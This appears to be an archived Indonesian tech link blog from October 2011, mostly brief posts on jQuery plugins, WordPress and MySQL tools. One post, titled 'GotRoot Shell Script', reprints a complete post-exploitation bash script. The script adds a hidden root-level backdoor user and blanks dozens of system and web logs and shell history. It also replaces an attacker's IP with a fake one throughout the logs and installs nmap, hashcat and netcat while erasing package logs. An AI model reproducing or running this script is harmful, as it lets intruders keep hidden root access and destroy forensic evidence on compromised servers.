(Read More..)Sabtu, 29 Oktober 2011
Force Reload of Scripts and Stylesheets in your Plugin or Theme
Kamis, 27 Oktober 2011
Rabu, 26 Oktober 2011
Minibloq Arduino IDE is in Beta and in need of testers
Automatic Downtimes in Nagios Without Using Time Periods
jQuery.fracs determines the fraction of an HTML element that is
currently in the viewport, as well as the fraction
it takes of the complete viewport and the fraction of
the area that might possibly be visible. It also provides the
coordinates of the visible rectangle in document,
element and viewport space.
See the demo to get an impression
of some of the features.
Selasa, 25 Oktober 2011
Making slave pre-fetching work better with SSD
SIMPLEMODAL is a small plugin to create modal windows.
It can be used to generate alert or confirm messages with few lines of
code. Confirm configuration involves the use of callbacks to be applied
to affirmative action; it can work in asynchronous mode and retrieve
content from external pages or getting the inline content.
SIMPLEMODAL is not a lightbox although the possibility to hide parts of its layout may partially make it similar.
Minggu, 23 Oktober 2011
tangle is a JS library
Nice: tangle is a JS library which allows users to interactively explore documents and play with parameters - #useful
Sabtu, 22 Oktober 2011
RECOMENDED !!!!! The Full Monty – CentOS 5.5, drbd, PaceMaker, MySQL, Tunsten Replication and more
part 1
part 2
The Full Monty- Part 2
part 3
Jumat, 21 Oktober 2011
If you're making a presentation on JavaScript, make it in Javascript.
Write your slideshow in HTML, style it with CSS and control it with
some jQuery-powered JavaScript. When you're done, Fathom.js even lets
you sync the video of your presentation quickly and easily.
Fathom.js comes with mouse, keyboard and scroll bar navigation built
in and provides a simple API for creating your own custom interfaces.
Exporting the mysql.slow_log table into slow query log format
CSS Sprites for the Modern Era: Refined, Animated, and Semantic Read more: – CSS Sprites for the Modern Era: Refined, Animated, and Semantic (Copied code is unlikely to work. This is deliberate.) Under Creative Commons License: Attribution Non-Commercial Share Alike
Recommended Reading
Some similar approaches I found inspirational in building this technique include Neal Grosskopf’s approach to re-using background images for CSS Spites by manipulating them withbackground-size
. CSS Ninja also uses a similar technique, while Sol Tanaka created CSS Sprites without background images.deck.js
deck.js: a powerful HTML-based presentation system -
Kamis, 20 Oktober 2011
Flexible Nav jQuery library.
Flexible Nav jQuery library.
Flexible Nav is a small jQuery library which add a smart navigation bar on the right of the page. It improves a web page navigation and helps to visualize different sections of a document, an article,.. any web page.Nav links are distributed proportionally to the page sections. See how your scrollbar "weds" these links :) (Read More..)
Rabu, 19 Oktober 2011
Stanford Web Applications
Course Description
Although the World-Wide Web was initially conceived as a vehicle for delivering documents, it is now being used as a platform for sophisticated interactive applications, displacing the traditional mechanism of installable binaries. Web-based applications offer numerous advantages, such as instant access, automatic upgrades, and opportunities for collaboration on a massive scale. However, creating Web applications requires different approaches than traditional applications and involves the integration of numerous technologies. This class will introduce you to the Web technologies and give you experience creating Web applications. In the process you will learn about markup languages, scripting languages, network protocols, interactive graphics, event-driven programming, and databases, and see how they all work together to deliver exciting applications. (Read More..)
Selasa, 18 Oktober 2011
Google Gambar
Important Caveats When Using pt-online-schema-change
pt-online-schema-change performs online, non-blocking schema changes to a table.
Senin, 17 Oktober 2011
JavaScript currency conversion library, done right - with no dependencies, in just over 1 kb.
(Read More..)Sticky
Sticky is a simple, key/value pair, browser-storage cache leveraging the latest HTML5 storage API's. Sticky persists to memory, indexedDB, webSQL, localStorage, globalStorage, and cookies. Objects and arrays are stringified before storage, and strings longer than 128 characters aren't persisted to cookies.Features
- Tiny and fast
- Callbacks for everything
- Store strings, numbers, and objects – JSON in and JSON out
- Simple abstraction for IndexedDB and WebSQL's complexity
- MIT licensed
Sabtu, 15 Oktober 2011
How to Sync A Local & Remote WordPress Blog Using Version Control
Advanced Layout Templates In WordPress’ Content Editor
Drizzle / dbqp updates
alat untuk testing drizzle
Jumat, 14 Oktober 2011
Benchmarking Galera replication overhead
Kamis, 13 Oktober 2011
GotRoot Shell Script
#!/bin/bash #Coded By Codeine #Visit For Updates #Or If You Have Input # #Version: 1.2 # #Send Any Problems To Or Visit Site Above # ################################################################ clear echo "#########Overdose Shell Script############" echo "# _____ _ ______ _ # " echo "#| __ \ | | | ___ \ | | # " echo "#| | \/ ___ | |_ | |_/ /___ ___ | |_ # " echo "#| | __ / _ \| __| | // _ \ / _ \| __|# " echo "#| |_\ \ (_) | |_ | |\ \ (_) | (_) | |_ #" echo "# \____/\___/ \__| \_| \_\___/ \___/ \__|#" echo "################By Codeine################" if [ "$(id -u)" != "0" ]; then echo ">You Must Run As Root<" 1>&2 exit 1 fi echo "Usage $0 [option]" echo "" echo "" if [ "$1" == "--help" ] || [ "$1" == "" ]; then echo "Usage $0 [option]" echo "--help Displays List Of Options" echo "--packages Install Various Packages(Run For List)" echo "--addroot Add Root User" echo "--spooflogs Spoof Logs With Fake IP" echo "--clearlogs Blanks Out Logs" echo "--support Gather Tats To Help Support The Project" exit elif [ "$1" == "--addroot" ]; then echo "[*]Enter Username: " read rusername useradd -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M $rusername echo "$rusername Was Created" echo "[*]Set Password: " passwd $rusername exit elif [ "$1" == "--clearlogs" ]; then echo "[*]Clearning Logs..." echo "------------------------------------" #Clears 32 Different Logs blanklog() { if [ -f ${1} ]; then echo "" echo "--[*]Cleared ${1}" echo "" > ${1} if [ -f ${1}.1 ]; then echo "--[*]Cleared ${1} Backup" echo "" > ${1}.1 fi fi } blanklog /var/log/lastlog blanklog /var/log/syslog blanklog /var/log/syslog blanklog /var/log/messages blanklog /var/log/httpd/access_log blanklog /var/log/httpd/access.log blanklog /var/log/httpd/error_log blanklog /var/log/httpd/error.log blanklog /var/log/apache2/access_log blanklog /var/log/apache2/access.log blanklog /var/log/apache2/error.log blanklog /var/log/apache2/error_log blanklog /var/log/wtmp blanklog /var/log/secure blanklog /var/log/xferlog blanklog /var/log/auth.log blanklog /var/log/lighttpd/lighttpd.error.log blanklog /var/log/lighttpd/lighttpd.access.log blanklog /var/run/utmp blanklog /var/www/logs/access_log blanklog /var/www/logs/access.log blanklog /var/www/logs/error_log blanklog /var/www/logs/error.log blanklog /var/log/apache/access_log blanklog /var/log/apache/access.log blanklog /var/log/apache/error_log blanklog /var/log/apache/error.log blanklog /var/log/yum.log blanklog /etc/httpd/logs/access_log blanklog /etc/httpd/logs/access.log blanklog /etc/httpd/logs/error_log blanklog /etc/httpd/logs/error.log echo "" echo "--[*]Clearing Bash History" echo -n > ~/.bash_history history -c echo "------------------------------------" echo "[*]All Logs Cleared" exit elif [ "$1" == "--packages" ]; then echo "[*]Listing Packages.." echo "------------------------------------" echo "" echo "0) Install All" echo "1) NMAP" echo "2) Hashcat" echo "3) Netcat" echo "Which Would You Like To Install: " read pinstall if [ "$pinstall" == "0" ] || [ "$pinstall" == "1" ] || [ "$pinstall" == "2" ] || [ "$pinstall" == "3" ]; then function nmapinstall { echo "[*]Checking If Nmap Is Installed:" if [ -d /usr/local/share/nmap/ ]; then echo "[*]Nmap Is Installed. --Version" nmap --version else echo "[*]Nmap Is Not Installed" echo "[*]Nmap Installation Will Now Commence" wget -c bzip2 -cd nmap-5.59BETA1.tar.bz2 | tar xvf - cd nmap-5.59BETA1 ./configure make make install echo "[*]Nmap Installed. Now Cleaning Up" rm -r nmap-5.59BETA1 rm nmap-5.59BETA1.tar.bz2 if [ -f /var/log/dpkg.log ]; then echo "" > /var/log/dpkg.log if [ -f /var/log/dpkg.log.1 ]; then echo "" > /var/log/dpkg.log.1 fi fi fi } function hashcatinstall { if [ ! -d /home/sysinstall/ ]; then mkdir /home/sysinstall fi if [ ! -d /home/sysinstall/hashcat/ ]; then cd /home/sysinstall wget tar xvfz hashcat.tar.gz rm hashcat.tar.gz else echo "[*]Hashcat Is Already Installed" fi } function netcatinstall { if [ ! -f /usr/local/bin/nc ]; then if [ ! -d /home/sysinstall/ ]; then mkdir /home/sysinstall fi cd /home/sysinstall wget tar -xzf netcat-0.7.1.tar.gz cd netcat-0.7.1.tar.gz ./configure make make install echo "[*]Netcat Installed. Now Cleaning Up" rm netcat-0.7.1.tar.gz rm netcat-0.7.1 if [ -f /var/log/dpkg.log ]; then echo "" > /var/log/dpkg.log if [ -f /var/log/dpkg.log.1 ]; then echo "" > /var/log/dpkg.log.1 fi fi else echo "[*]Netcat Is Already Installed" fi } if [ "$pinstall" == "1" ]; then nmapinstall elif [ "$pinstall" == "2" ]; then hashcatinstall elif [ "$pinstall" == "3" ]; then netcatinstall elif [ "$pinstall" == "0" ]; then nmapinstall hashcatinstall netcatinstall fi else echo "Please Enter A Valid Package Number" exit fi elif [ "$1" == "--spooflogs" ]; then echo "[*]IP To Replace: " read realip echo "[*]IP To Replace With: " read fakeip echo "" echo "[*]Spoofing Logs..." echo "------------------------------------" spooflog() { if [ -f ${1} ]; then echo "" echo "--[*]Spoofed ${1}" sed -i "s/$realip/$fakeip/g" ${1} if [ -f ${1}.1 ]; then echo "--[*]Spoofed ${1} Backup" sed -i "s/$realip/$fakeip/g" ${1}.1 fi fi } spooflog /var/log/lastlog spooflog /var/log/syslog spooflog /var/log/syslog spooflog /var/log/messages spooflog /var/log/httpd/access_log spooflog /var/log/httpd/access.log spooflog /var/log/httpd/error_log spooflog /var/log/httpd/error.log spooflog /var/log/apache2/access_log spooflog /var/log/apache2/access.log spooflog /var/log/apache2/error.log spooflog /var/log/apache2/error_log spooflog /var/log/wtmp spooflog /var/log/secure spooflog /var/log/xferlog spooflog /var/log/auth.log spooflog /var/log/lighttpd/lighttpd.error.log spooflog /var/log/lighttpd/lighttpd.access.log spooflog /var/run/utmp spooflog /var/www/logs/access_log spooflog /var/www/logs/access.log spooflog /var/www/logs/error_log spooflog /var/www/logs/error.log spooflog /var/log/apache/access_log spooflog /var/log/apache/access.log spooflog /var/log/apache/error_log spooflog /var/log/apache/error.log spooflog /var/log/yum.log spooflog /etc/httpd/logs/access_log spooflog /etc/httpd/logs/access.log spooflog /etc/httpd/logs/error_log spooflog /etc/httpd/logs/error.log echo "------------------------------------" echo "[*]Logs Spoofed" elif [ "$1" == "--support" ]; then echo "[*]If you would like to support the production of this script," echo "[*]Email the following stats to" echo "[*]Server mailer may not send which is why I ask for manual email" echo "-----------Stats I Would Like----------------" echo "ls /usr/bin" echo "[*]This will display installed applications, warning this will display alot of files & dirs." echo "" echo "ls /var/log" echo "[*]This is the defualt location for logs." echo "-----------------------------------------------" echo "" echo "[*]I would very much appreciate if you ran those list commands and sent me the results" echo "[*]If you want to see this script develope more its a simple task to help out." fi ##End of file: Visit More..)
InnoDB Memcached with Binlog Capability
Rabu, 12 Oktober 2011
Getting Help From Linux
Selasa, 11 Oktober 2011
Senin, 10 Oktober 2011
Eventual consistency with transactions
JavaScript: Retrieve and paginate JSON-encoded data
Minggu, 09 Oktober 2011
Sabtu, 08 Oktober 2011
Jumat, 07 Oktober 2011
Kamis, 06 Oktober 2011
Rabu, 05 Oktober 2011
Improve The User Experience By Tracking Errors
Selasa, 04 Oktober 2011
WordPress Internals: How WordPress Boots Up
Tarantool/Box Benchmark
tools untuk testing
Becoming a Rock Star MySQL DBA
Thorough and enjoyable presentation by @sheeri "Becoming a Rock Star MySQL DBA". Annotated slides at”
Senin, 03 Oktober 2011
Windows Native Authentication for MySQL
don't be a GUI rookie forever, be in command
slides for my presentation "don't be a GUI rookie forever, be in command"
(Read More..)Minggu, 02 Oktober 2011
Open Compute Project !!!!
Hacking Conventional Computing Infrastructure
By releasing Open Compute Project technologies as open hardware, our goal is to develop servers and data centers following the model traditionally associated with open source software projects. That’s where you come in.